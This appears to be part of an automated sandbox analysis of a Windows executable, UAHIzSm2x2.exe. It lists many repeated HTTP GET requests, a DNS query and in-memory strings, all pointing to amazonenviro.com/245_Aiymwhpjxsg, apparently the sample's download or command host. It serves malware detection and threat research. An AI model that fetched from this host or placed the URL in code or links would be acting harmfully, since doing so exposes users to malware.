            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficDNS traffic detected: DNS query: amazonenviro.com
            Source: UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg
            Source: UAHIzSm2x2.exe, 00000000.00000003.3053592631.000000000088D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg(
            Source: UAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000080E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg.mui
            Source: UAHIzSm2x2.exe, 00000000.00000003.3053592631.000000000088D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg0
            Source: UAHIzSm2x2.exe, 00000000.00000003.2897902282.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg1
            Source: UAHIzSm2x2.exe, 00000000.00000003.2956290671.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg5
            Source: UAHIzSm2x2.exe, 00000000.00000003.3053706651.000000000084A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgC
            Source: UAHIzSm2x2.exe, 00000000.00000003.2898002791.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgJh
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgP
            Source: UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsgl
            Source: UAHIzSm2x2.exe, 00000000.00000003.3053592631.000000000088D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsgp
            Source: UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000088D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2897902282.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsgt
            Source: UAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsgxk6v
            Source: UAHIzSm2x2.exe, 00000000.00000003.2956388004.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/5
            Source: UAHIzSm2x2.exe, 00000000.00000003.2301934670.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/Bbe
            Source: UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/M
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/U
            Source: UAHIzSm2x2.exe, 00000000.00000003.2898002791.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/d
            Source: UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/~ha~
            Source: UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsg
